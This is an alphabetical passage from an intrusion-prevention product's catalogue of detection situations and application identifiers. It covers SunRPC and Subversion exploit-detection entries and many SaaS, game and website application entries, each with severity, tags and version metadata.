Vulnerability: EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution
Description:
Back to top

SunRPC_TCP-EMC-NetWorker-Nsrd-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC NetWorker detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-477-5211
Vulnerability: EMC-NetWorker-Nsrd-Stack-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-Kerberos-Kadmind-BOF

About this situation: Buffer overflow exploit against MIT Kerberos detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2007, Any Operating System not specific, MIT Kerberos not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-MIT-Kerberos-Kadmind-RPC-Library-Unix-Authentication-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17047

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2020-11, CVE2020, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Microsoft-Windows-NFS-Server-CVE-2020-17047
Description:
Back to top

SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17051

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, MS2020-11, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Microsoft-Windows-NFS-Server-CVE-2020-17051
Description:
Back to top

SunRPC_TCP-Microsoft-Windows-NFS-Server-CVE-2020-17056

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, MS2020-11, CVE2020, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Microsoft-Windows-NFS-Server-CVE-2020-17056
Description:
Back to top

SunRPC_TCP-Microsoft-Windows-NFS-Server-NLM-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, MS2020-11, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1317-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Microsoft-Windows-NFS-Server-CVE-2020-17056
Description:
Back to top

SunRPC_TCP-MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF

About this situation: Buffer overflow exploit against MIT Kerberos detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2007, Any Operating System not specific, MIT Kerberos not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF
Description:
Back to top

SunRPC_TCP-MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer

About this situation: An attempt to exploit a vulnerability in Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, MIT Kerberos, CVE2007, Unix not specific, MIT Kerberos not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer
Description:
Back to top

SunRPC_TCP-Nfs-Statd-Format-String

About this situation: Format string vulnerability in nfsutils
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, nfs-utils, CVE2000, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-340-4219
Vulnerability: RPC-Status-GHBN-Format-String-Vulnerability
Description:
Back to top

SunRPC_TCP-Not-SunRPC

About this situation: Detect non-SunRPC requests
Context: TCP Client Stream Unknown
Severity: 1
Tags: Unix, Any Hardware, Unix not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-360-4219
Last changed: sgpkg-ips-360-4219
Description:
Back to top

SunRPC_TCP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell NetWare NFS Portmapper daemon over TCP detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
Description:
Back to top

SunRPC_TCP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2011, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-Portmapper-Null-Query

About this situation: Detected portmapper null query
Context: TCP Client Stream Unknown
Severity: 1
Tags: Unix, Any Hardware, Unix not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-324-4219
Description:
Back to top

SunRPC_TCP-Shared-Variables

About this situation: Shared variables for use in other streams
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1466-5242
Last changed: sgpkg-ips-1855-5242
Description:
Back to top

SunRPC_TCP-ToolTalk-Access

About this situation: Detected ToolTalk Access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, Unix not specific, Probe, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-ToolTalk-Access
Description:
Back to top

SunRPC_TCP-ToolTalk-Buffer-Overflow

About this situation: Detected ToolTalk Exploit
Context: TCP Client Stream Unknown
Severity: 10
Tags: Unix, Any Hardware, CVE1999, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-ToolTalk-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-ToolTalk-Format-String

About this situation: Detected ToolTalk Exploit
Context: TCP Client Stream Unknown
Severity: 10
Tags: Unix, Any Hardware, CVE2001, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-Ttdbserver-Format-String-Vulnerability
Description:
Back to top

SunRPC_TCP-Windows-NFS-CVE-2022-24491

About this situation: Windows NFS RCE CVE-2022-24491
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2022-04, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1454-5242
Last changed: sgpkg-ips-1454-5242
Vulnerability: Windows-NFS-Service-RCE-CVE-2022-24491
Description:
Back to top

SunRPC_TCP-Windows-NFS-CVE-2022-24497

About this situation: Windows NFS RCE CVE-2022-24497
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2022-04, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1454-5242
Last changed: sgpkg-ips-1454-5242
Vulnerability: Windows-NFS-Service-RCE-CVE-2022-24497
Description:
Back to top

SunRPC_TCP-Windows-NFS-CVE-2022-26937

About this situation: Windows NFS RCE CVE-2022-26937
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2022-05, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1466-5242
Last changed: sgpkg-ips-1855-5242
Vulnerability: Microsoft-Windows-NFS-CVE-2022-26937
Description:
Back to top

SunRPC_TCP-Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993
Description:
Back to top

SunRPC_TCP-Xdr-Array-Buffer-Overflow-2

About this situation: Attempt to exploit a buffer overflow in Solaris XDR implementation
Context: TCP Client Stream Unknown
Severity: 10
Tags: Unix, Any Hardware, rpc.ttdbserverd, MS2002, CVE2002, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-Xdr-Array-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-Yppasswd-Username-BOF

About this situation: Shellcode possibly used to exploit rpc.yppasswd detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Linux, Any Hardware, rpc.yppasswd, CVE2001, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-Yppasswd-Username-BOF
Description:
Back to top

SunTrust-Mortgage-Broker

About this situation: Application SunTrust-Mortgage-Broker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SunTrust Mortgage provide the unmatched service you need to choose a home mortgage plan that works for you, helping you feel confident about your financial decisions.
Back to top

Super-User

About this situation: Application Super-User detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Super User is a question and answer site for computer users.
Back to top

Supercell-Clash-of-Clans

About this situation: Supercell Clash of Clans usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Games
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-595-5211
Description: Supercell Clash of Clans game usage has been detected.
Back to top

Supercell-Hay-Day

About this situation: Supercell Hay Day usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Games
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-595-5211
Description: Supercell Hay Day game usage has been detected.
Back to top

SUPERCentral

About this situation: Application SUPERCentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SUPERCentral is an independent, wholesale supplier of on-line Self-Managed Superannuation Fund deeds, deed updates, SMSF support and compliance documentation, estate planning, limited recourse borrowing and business services products.
Back to top

SupeRep

About this situation: Application SupeRep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SupeRep allows sales reps and their managers to present their catalogs, take orders, upsell and cross sell, create and fill-out customized forms and surveys, view their customers past activities including debt and payment history, view accounts near them on a map, communicate with their team through tasks and reminders synchronized with their Outlook and much, much more. SupeRep offers out of the box integration to popular ERP, accounting and CRM systems (such as SAP, Sage, Microsoft Dynamics, NetSuite, QuickBooks) and fully integrates to payment systems.
Back to top

Superfeedr

About this situation: Application Superfeedr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Superfeedr : Real-time feed parsing in the cloud - Atom over PubSubHubbub and XMPP. We make RSS feeds realtime for both publishers and subscribers, with the PubSubHubbub and XMPP protocols.
Back to top

SuperSaaS

About this situation: Application SuperSaaS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SuperSaaS provides a web service to create a flexible web based scheduling system that you can add to your own web site. The system can be used as a simple shared calendar or as a fully fledged booking system which gives it a wide range of application.
Back to top

SupplierSelect

About this situation: Application SupplierSelect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SupplierSelect cuts down the administrative burden of managing sophisticated RFP, RFQ, tender and system selection projects.
Back to top

SupplyOn

About this situation: Application SupplyOn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SupplyOn is the shared supply chain collaboration platform for a growing number of globally active companies. Firms use SupplyOn as a central online platform to manage business processes with their suppliers and service providers across continents in a structured, transparent and secure manner.
Back to top

SupportBee

About this situation: Application SupportBee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SupportBee build for manage customer support emails. SupportBee is built for teams and all plans come with unlimited logins to make team collaboration easier.
Back to top

Supportify

About this situation: Application Supportify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Supportify.io is a software as a service application that allows you to easily provide dynamic help and support content within any of your applications.
Back to top

SupportKit

About this situation: Application SupportKit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SupportKit provide cloud service to build lasting relationships with your customers with beautifully simple in-app messaging.
Back to top

Surdoc

About this situation: Application Surdoc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurDoc - Online backup
Back to top

SURE!-Cloud-(formerly-eVapt)

About this situation: Application SURE!-Cloud-(formerly-eVapt) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SURE
Back to top

SurePayroll

About this situation: Application SurePayroll detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurePayroll to provides easy online payroll services.
Back to top

SurePrep

About this situation: Application SurePrep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurePrep is automated electronic workpaper solutions, advanced OCR tools, automatic tax return population functions and onshore and offshore outsourcing options are used by nearly half of the top 100 accounting firms in the country.
Back to top

Suresome

About this situation: Suresome usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-1128-5242
Description: Suresome is a secure Web Proxy service.
Back to top

SurfTown

About this situation: Application SurfTown detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurfTown is a web hosting company, providing domains, web hosting, email.
Back to top

Surreal-CMS

About this situation: Application Surreal-CMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Surreal CMS is a revolutionary Content Management Service. Edit your website inline, just like it appears on the web.
Back to top

Surveillance

About this situation: Sites that enable real-time monitoring of various operations via network cameras, webcams and other video recording devices.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable real-time monitoring of various operations via network cameras, webcams and other video recording devices.
Back to top

Survey-Anyplace

About this situation: Application Survey-Anyplace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Survey Anyplace enables anybody to create appealing surveys for tablets and smartphones.
Back to top

Survey-Galaxy

About this situation: Application Survey-Galaxy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Survey Galaxy's online survey software allows you to create professional looking online surveys and questionnaires and deploy them via the Internet.
Back to top

SurveyExpression

About this situation: Application SurveyExpression detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurveyExpression is online survey software tool.
Back to top

SurveyGizmo

About this situation: SurveyGizmo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: SurveyGizmo is used to create surveys, landing pages, polls, quizzes, contact forms, ticketing queues and mobile marketing campaigns.
Back to top

Surveyi2i

About this situation: Application Surveyi2i detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Surveyi2i is a cloud-based integrated survey analysis and reporting platform with advanced analytics and text mining capabilities. Surveyi2i enables researchers, analysts and business managers by simplifying the process of analysing, collaborating and deriving actionable insights from survey data.
Back to top

Surveymethods

About this situation: SurveyMethods usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: SurveyMethods.com enables individuals and businesses to easily create professional surveys, deploy them via email or post them on the web, and collect and analyze respondent data through its easy-to-use graphical based analysis module.
Back to top

SurveyMonkey

About this situation: SurveyMonkey usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-628-5211
Description: SurveyMonkey is an online survey service.
Back to top

SurveyPocket

About this situation: Application SurveyPocket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurveyPocket is a mobile application to run surveys on your iPad, Android tablet, iPhone or other smartphone devices. SurveyPocket is part of the Survey Analytics Enterprise Research Platform for real-time feedback collection and data analysis.
Back to top

Surveyshare

About this situation: SurveyShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: SurveyShare enables users to create their own web-based polls and surveys. SurveyShare is used by several universities to conduct research and classroom evaluation surveys.
Back to top

SurveySwipe

About this situation: Application SurveySwipe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SurveySwipe is a mobile savvy research app powered by the dedicated team at Survey Analytics.
Back to top

Survs

About this situation: Survs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Survs lets you create professional surveys easily within the team. Its friendly interface and compelling features provides collected responses via multiple channels like link, email, on social networks, or right from website.
Back to top

SUSE

About this situation: Application SUSE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SUSE is an open source software, provides interoperable Linux and cloud infrastructure solutions for enterprises.
Back to top

Suspicious Content

About this situation: Sites found to contain suspicious content.
Context: URL Application Context
Severity: 1
Tags: Extended Protection, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites found to contain suspicious content.
Back to top

Suspicious Embedded Link

About this situation: Sites suspected of being infected with a malicious link.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites suspected of being infected with a malicious link.
Back to top

Suspicious Host

About this situation: Request to suspicious http host detected
Context: URL Whitelist Application Context
Severity: 1
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1591-5242
Description: Request to a suspicious host was detected.
Back to top

Suunto-Movescount

About this situation: Suunto Movescount usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-769-5211
Description: Movescount is a sports tracking service.
Back to top

SVB-Asset-Management

About this situation: Application SVB-Asset-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Silicon Valley Bank offers commercial and private banking, asset management, private wealth management, brokerage and investment services, funds management and business valuation services to companies in the technology, life science and healthcare, private equity and venture capital, and premium wine industries.
Back to top

Svchost

About this situation: Endpoint Context Agent based svchost.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process svchost.exe was detected. Svchost.exe hosts a large amount of system services on Windows operating systems, for example DNS, NTP and Windows Update.
Back to top

SVN_Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: Subversion TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow
Description:
Back to top

SVN_SS-Apache-Subversion-SVN-SSH-Url-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: Subversion TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Apache-Subversion-SVN-SSH-Url-Command-Execution
Description:
Back to top

SVN_Subversion-Apr-Time-T-System-Compromise

About this situation: Subversion's apr_time_t data conversion buffer overflow attempt
Context: Subversion TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-159-2032
Vulnerability: SVN-Subversion-Apr-Time-T-System-Compromise
Description:
Back to top

SVN_Subversion-String-Parsing

About this situation: An attempt to exploit a vulnerability in Subversion detected
Context: Subversion TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: SVN_Subversion-String-Parsing
Description:
Back to top

SVN_Suspicious-Request

About this situation: A suspicious traffic pattern detected
Context: Subversion TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Svt-Play

About this situation: SVT Play usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-755-5211
Description: SVT Play is a video streaming site for Swedish public television provided by Sveriges Television. The application can be accessed using a web browser at site: www.svtplay.se
Back to top

Swapper

About this situation: swapper usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: An instant messaging service for adults; Source Swappernet
Back to top

Sweetwater

About this situation: Application Sweetwater detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sweetwater is the dealer in technology equipment for musicians, recording studios, and broadcasters.
Back to top

Swift-Alliance-Access

About this situation: Application Swift-Alliance-Access detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alliance Access is SWIFT
Back to top

SwiftKanban

About this situation: Application SwiftKanban detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SwiftKanban is a web-based electronic Enterprise/ Portfolio Kanban and Visual Management tool for both collocated and distributed teams and enterprises. ons.
Back to top

SwiftStack

About this situation: Application SwiftStack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SwiftStack powers enterprises with a software defined storage platform, built on the OpenStack Swift object storage engine, to build a massively scalable private cloud.
Back to top

Swiftype

About this situation: Application Swiftype detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Swiftype is a hosted search solution that lets site owners deliver powerful, customizable search for their website or mobile app with just a few lines of code.
Back to top

Swissdisk

About this situation: SwissDisk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: offers two different services, $5 unlimited backup with a 2GB free trial, also free and paid storage, sync service over WebDAV.The service is notable for its end-to-end encryption. The service does not require any downloads and no special drivers are needed. Source: Wikipedia
Back to top

Swizly

About this situation: Application Swizly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fusing your social media communication into one destination. Swizly allows you to display aggregated content from the different social networks, populate user generated content using hashtags to enhance the overall brand experience, to add engagement to events, and propagate your message via sharing options.
Back to top

Sword-Achiever

About this situation: Application Sword-Achiever detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sword Achiever is a global solution used by companies and organisations in highly regulated industries to manage their Governance, Risk and Compliance software requirements.
Back to top

Swtor

About this situation: Application Swtor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Swtor is a video game developer and publisher company.
Back to top

Sybase

About this situation: Sybase traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-759-5211
Description: Sybase is a relational database software that allows users to manage, analyze, mobilize information, data warehousing solutions, and mobile application development platforms.
Back to top

SyberWorks

About this situation: Application SyberWorks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SyberWorks specializes in custom e-Learning solutions, learning management system, learning content management systems and custom online training development for corporations, governments and non-profits.
Back to top

Symantec Diagnostic Tool

